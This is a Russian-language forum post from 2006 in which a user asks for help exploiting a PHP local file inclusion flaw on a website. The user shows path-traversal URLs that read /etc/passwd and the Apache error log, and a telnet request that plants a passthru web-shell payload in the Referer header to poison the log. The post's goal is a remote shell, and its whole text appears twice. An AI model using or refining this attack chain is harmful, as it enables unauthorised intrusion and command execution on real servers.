MyPoorBrain
11.11.2006, 17:37
Помогите разобраться и инклудом!
Я нашёл вот это:
http://ввв.сайд.орг/static.php?file=../../../../../../../../../../../../../../../../../etc/passwd
Пошарил...
http://ввв.сайд.орг/static.php?file=../../../../../../../../../../../../usr/local/apache/logs/error_log
Я собирался подконектиться к телнету...
# telnet 127.0.0.1 80
# Trying 127.0.0.1...
# Connected to localhost.
# Escape character is '^]'.
# GET HTTP/1.1
# Accept: */*
# Accept-Language: ru.
# Accept-Encoding: deflate.
# User-Agent: Lynx/2.8.5rel.1 libwww-FM/2.14
# Host: 127.0.0.1
# Connection: Close
# Referer: http://127.0.0.1/<?passthru($_GET['cmd']);?>
# сдесь мы передали наш кода в поле Referer - на тот случай если фильтруются передоваемые GET-oм параметры сценарием на сервере.
...что бы получить шелл на базе лога. Но у меня, представьте себе, telnet не пашет =). Чо посоветуете?
Я нашёл вот это:
http://ввв.сайд.орг/static.php?file=../../../../../../../../../../../../../../../../../etc/passwd
Пошарил...
http://ввв.сайд.орг/static.php?file=../../../../../../../../../../../../usr/local/apache/logs/error_log
Я собирался подконектиться к телнету...
# telnet 127.0.0.1 80
# Trying 127.0.0.1...
# Connected to localhost.
# Escape character is '^]'.
# GET HTTP/1.1
# Accept: */*
# Accept-Language: ru.
# Accept-Encoding: deflate.
# User-Agent: Lynx/2.8.5rel.1 libwww-FM/2.14
# Host: 127.0.0.1
# Connection: Close
# Referer: http://127.0.0.1/<?passthru($_GET['cmd']);?>
# сдесь мы передали наш кода в поле Referer - на тот случай если фильтруются передоваемые GET-oм параметры сценарием на сервере.
...что бы получить шелл на базе лога. Но у меня, представьте себе, telnet не пашет =). Чо посоветуете?